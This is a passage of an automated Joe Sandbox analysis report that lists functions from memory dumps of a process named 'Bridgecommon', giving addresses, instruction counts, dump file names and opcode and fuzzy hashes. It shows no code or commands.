                                                                                              • Instruction ID: 7a38ba0a6d7df1508af04d942fd0bb22f681d1dbef1f3c5f7414117e67c9668c
                                                                                              • Opcode Fuzzy Hash: 0092ded93127deea18adf1d4c86615d31208ed26a7bdb0caad6650519258112c
                                                                                              • Instruction Fuzzy Hash: 92E01A6154F3C44FCB1AEB7488698553F609E6721078B40EEC545CF1B3E62DC949C702
                                                                                              Function 00007FFD9BAF9391 Relevance: .3, Instructions: 314COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f48b4d110043e746c3a6486c546794eae92c5a5bc285e2a540d2367f1166897
                                                                                              • Instruction ID: 1c097ea1494e5d31b9a57d582c149fbaf306e832c2b815c5f026391d63df7207
                                                                                              • Opcode Fuzzy Hash: 3f48b4d110043e746c3a6486c546794eae92c5a5bc285e2a540d2367f1166897
                                                                                              • Instruction Fuzzy Hash: 3DA19431B18A0D4FDB58EB68C469AA977E1FF98314B514279E01DC72E6DF38E842CB41
                                                                                              Function 00007FFD9BB032DD Relevance: .3, Instructions: 279COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7515af319c0b7839869873bbe68281f138c7c5c30c35d341aa221d12d112e532
                                                                                              • Instruction ID: 764f362849de2bf77bbbebd6a7a0532c45153a92a83950cf47f84f95dd538c74
                                                                                              • Opcode Fuzzy Hash: 7515af319c0b7839869873bbe68281f138c7c5c30c35d341aa221d12d112e532
                                                                                              • Instruction Fuzzy Hash: FC810221B1DA4E0FEBACEB5884BA6B972C2FF98358F044179D48DC71EBDD28A9454341
                                                                                              Function 00007FFD9BB03365 Relevance: .2, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e66008e42871516637fc8eda10c274c00dadf19e7a4c3a5113efa00f5a51cf41
                                                                                              • Instruction ID: 8c3b882390a83fefe3b9e2d8bcd3b88402d99978736cad34c0bd1a3abc3252fe
                                                                                              • Opcode Fuzzy Hash: e66008e42871516637fc8eda10c274c00dadf19e7a4c3a5113efa00f5a51cf41
                                                                                              • Instruction Fuzzy Hash: B551E321B1DA4E0FEBACEB5884BA7B972C1FF98318F044179D44EC72EBDD2869454340
                                                                                              Function 00007FFD9BAD08E8 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 971072df3818c1190adfef7e00fd846d6c3b0d90dd967b1a3fc5eb4214d020d2
                                                                                              • Instruction ID: 04310598fade5cbe128115e467cd22ffa5b26d210cb805fd209eb1b17dad1cce
                                                                                              • Opcode Fuzzy Hash: 971072df3818c1190adfef7e00fd846d6c3b0d90dd967b1a3fc5eb4214d020d2
                                                                                              • Instruction Fuzzy Hash: 6431043130D9184FDB68EB5CE88A9B977D0EF9932130642BBE48AC7166D911EC828781
                                                                                              Function 00007FFD9BB022A8 Relevance: .1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9dc891efce4e5fd25dbf1bf6144ca2f96b96b5dc6a388e01efb8dc927c41fe36
                                                                                              • Instruction ID: 93c25e64338418a1636bc93fca5592c834f472250e5590a622aafd69c0187e91
                                                                                              • Opcode Fuzzy Hash: 9dc891efce4e5fd25dbf1bf6144ca2f96b96b5dc6a388e01efb8dc927c41fe36
                                                                                              • Instruction Fuzzy Hash: 2731F332A0DA1E4FEB78EA9CD8656AD73A1FFA4324F05027BD44DC72D9CD246D458780
                                                                                              Function 00007FFD9BAD0998 Relevance: .1, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15c8a40b1d2066603787abfdd075bca461135a3b157fa1390bc327189835a219
                                                                                              • Instruction ID: 62875ab954b0a96d16ebe46e36a7eb566b9d4275c6952758fb6a6432d4bb4857
                                                                                              • Opcode Fuzzy Hash: 15c8a40b1d2066603787abfdd075bca461135a3b157fa1390bc327189835a219
                                                                                              • Instruction Fuzzy Hash: 0121F421B19D1D0FE768B76C94AA779B2C6EFD8365B0102BDE40EC32F7DD58AC418285
                                                                                              Function 00007FFD9BAD119D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ebd7c68f28d7181370096f6bc76533176503b08f2ccccba3909ca1a51c09faf
                                                                                              • Instruction ID: 4d2a5556543bcaf78ddb5882efd9605d3db0f3e41291789513a3a6515cd83696
                                                                                              • Opcode Fuzzy Hash: 1ebd7c68f28d7181370096f6bc76533176503b08f2ccccba3909ca1a51c09faf
                                                                                              • Instruction Fuzzy Hash: D7318431B0954E8FDB55EB68C868ABD7BF1FFA5300F0546BAD00DD72A2DA68A940C750
                                                                                              Function 00007FFD9BAE4668 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 67d0f89c9f5ea94d1f6efee12fe74477b906600f2e5eb3f93e964b645e60b50a
                                                                                              • Instruction ID: 3507e1c5522e35c76184678facb3f511d4a6156fb4550681e6312fada665a7ac
                                                                                              • Opcode Fuzzy Hash: 67d0f89c9f5ea94d1f6efee12fe74477b906600f2e5eb3f93e964b645e60b50a
                                                                                              • Instruction Fuzzy Hash: BD31D73190E39D4FD7269F6488246AA3FB5EF53310F0641EBD489CB1B3D96C590687A2
                                                                                              Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction ID: 8ac27a1720ddaeee308c630b4011d0bf04d2fd96d68048d3572dfe2efbf426f6
                                                                                              • Opcode Fuzzy Hash: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction Fuzzy Hash: 0021E736B0D6499FE732E7A898710EC7B60EF92226F4542B3D0588B1E3D9682646C785
                                                                                              Function 00007FFD9BB0C998 Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bac477c1bad2a796efca7b7100a9fcd4d060726f753f2f5ac3f1e1af17d5e4da
                                                                                              • Instruction ID: 5a477c2a68a4bd716522d24ef74e7661b334630ec79063674c7a7981b21b9ae4
                                                                                              • Opcode Fuzzy Hash: bac477c1bad2a796efca7b7100a9fcd4d060726f753f2f5ac3f1e1af17d5e4da
                                                                                              • Instruction Fuzzy Hash: 5E21C232F0591E8BEB64DA59D8547FE73E2FB94314F014176E409D32D8CE396A058BD0
                                                                                              Function 00007FFD9BAD1B9F Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction ID: 8ecbdc433f6c6aeabb67a2672d2cfe2d71e1c4d3cbc927a0001d5a233f02f11a
                                                                                              • Opcode Fuzzy Hash: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction Fuzzy Hash: DA216221F0E90E4BEBB4E76884786B86292EFD4711F4643B5D40DC72F2EDB8AE418740
                                                                                              Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction ID: d56f1f7e036786d0397f16634f791572f8b08ee17f2cff34423b0dc15afac97e
                                                                                              • Opcode Fuzzy Hash: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction Fuzzy Hash: CD11ED35A0E28C8FE722DBA888701DC7FB0EF92611F4642F7D084DB2A2D9382645C784
                                                                                              Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction ID: 89880bc378c7becc4a535ebbbe995d79ff760e0672e7c7a9dc768ba78011436e
                                                                                              • Opcode Fuzzy Hash: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction Fuzzy Hash: E501DE35A0E38C9FE722DBA8C86019C7FB0EF82701F4642E7D044DB2A2D9386A44C780
                                                                                              Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction ID: 4c747736ce06db6f06195de5f38f3eb2660c79216c3e6b300e05bc932a1fe96d
                                                                                              • Opcode Fuzzy Hash: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction Fuzzy Hash: 3A01DF34E0E38D9FE722DBA4887459C7FB0EF56701F5542E7D054DB2A2D9786A44C740
                                                                                              Function 00007FFD9BAD1C2D Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 04225abf947b6779623892e0e3b1a668b8e5af2c3aceb391021f9c530c4332bb
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: F4F0E134B5981E8AEBB4A754C8647B87362FBD0711F5543F9C00D931A1DEB86A81CB40
                                                                                              Function 00007FFD9BAD0B77 Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction ID: 5afcf77b276a09ab29f865372710c162235bc7af3cbe879b44190248c4e77ad2
                                                                                              • Opcode Fuzzy Hash: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction Fuzzy Hash: 7BF02B3171EA49CFC742DB38DC999E47F60EF47205BAA15FAC08AC7572C220596ECB41
                                                                                              Function 00007FFD9BB0A4F9 Relevance: .0, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fed3e2b23e2ef7b47eb066ba9e75f628470e69cc61e0a571778c4825af1e0a00
                                                                                              • Instruction ID: 6d7a08d5debfa7477c2cdd9bc31398e7de0f1e4dfac1ba0cdef67bc303b7714a
                                                                                              • Opcode Fuzzy Hash: fed3e2b23e2ef7b47eb066ba9e75f628470e69cc61e0a571778c4825af1e0a00
                                                                                              • Instruction Fuzzy Hash: 51F0E521B0D7C80FC72A562948650617FF1CB6B11134A01FFC086C72A3ED58AC858341
                                                                                              Function 00007FFD9BAD1CDA Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: 5b195def51be91ae4969184ead09916cb35b04be2a8bfae561cac835b3aa5050
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: 98F0D024F0D40E4AEBB4D758C8786B83352EFD0711F5543B5C40D972F5DD786A458640
                                                                                              Function 00007FFD9BB01BE9 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction ID: a0010583900a89edfd703a8e1159066a4fda408acd39631b023e0bab7e7315c7
                                                                                              • Opcode Fuzzy Hash: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction Fuzzy Hash: AEE09220B197C44FCB0B9A3C48685607FA1EF571057C952EAC046CB1A3E918DC85C742
                                                                                              Function 00007FFD9BB074D5 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction ID: 343ba5e9e9bb1c9d1940badee7ff9fc5afa3bfd3d09b69df29b991ca14f1d62e
                                                                                              • Opcode Fuzzy Hash: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction Fuzzy Hash: 32E02223F0E6884FE31A0A384C748B43B609F3B22A34F00A7D08ACB6F7D8059D098302
                                                                                              Function 00007FFD9BAE3EB8 Relevance: .0, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b192a0ea98191691627029555fcad640ac7b7929dd5969e9070bacc8d67befd9
                                                                                              • Instruction ID: 74504d41f0c349d0026d981228a019bde562e82af99a2e846a28dea045a01348
                                                                                              • Opcode Fuzzy Hash: b192a0ea98191691627029555fcad640ac7b7929dd5969e9070bacc8d67befd9
                                                                                              • Instruction Fuzzy Hash: E1F08271E0855E8BEB15EB84C865ABD73E2FB50700F010679D426AB2E8DEB469018B80
                                                                                              Function 00007FFD9BB07D19 Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction ID: 2801a0626bf49da33327d900b299ad47e65a3a1cbe7daae0b93aa7b69d7b4c61
                                                                                              • Opcode Fuzzy Hash: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction Fuzzy Hash: 64E04F20A4D7C44FCB0AAB3888695503FA0DF6B215B8A01DAC045CB1B3D51DDC49C711
                                                                                              Function 00007FFD9BAF91A9 Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction ID: 54494d4839a1049948f64c419503b0db34feda57208a74932c42a1364c45b394
                                                                                              • Opcode Fuzzy Hash: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction Fuzzy Hash: 33E01A20A497844FCB0AAA3888695503FB1DF6B215B8A00D6C045CB1B3D51DD849C751
                                                                                              Function 00007FFD9BAE4622 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction ID: 76b4888e6025a938afe51861bed46b7babfd62e827d48f24d27dbce629313bbb
                                                                                              • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction Fuzzy Hash: 20E04F3270DC0E46FB75A75088705BF3696EBD0319B130339C02EC21B1DEBCA7028641
                                                                                              Function 00007FFD9BAD42E9 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d2ed5f6ef24528162e0c5d6d0b4e6acd4a191941b34513d960a86b17f11536ae
                                                                                              • Instruction ID: 70bf9138aeabc9d01bde8c9b316622cc13308fdc46d7648e26cb3aefa60624d4
                                                                                              • Opcode Fuzzy Hash: d2ed5f6ef24528162e0c5d6d0b4e6acd4a191941b34513d960a86b17f11536ae
                                                                                              • Instruction Fuzzy Hash: D5F02270518A1C8FCF98DB08C495EE9B7F1FB68305F114199914AE7260CB31AA80CF85
                                                                                              Function 00007FFD9BAD2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 80f32f3af981112524dfa9caf3547bb5af2cc3d6dc48dfb79d6b70ebd687c03b
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 4DE01230F0D11A46FBB49754D8617F962B0EBD4300F1121B8D50E933D1DD78AF81CA49
                                                                                              Function 00007FFD9BB0A050 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Function 00007FFD9BB0D459 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction ID: 0adc029638af732f1c5008ccfe32db8d26f2a395cc251c8000867d32e9d1937a
                                                                                              • Opcode Fuzzy Hash: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction Fuzzy Hash: 3CE0BF6294B7C44FC74B973588A88947F60DE5721178A41EAC145CF6B3E92A8D49C711
                                                                                              Function 00007FFD9BB0A0E0 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
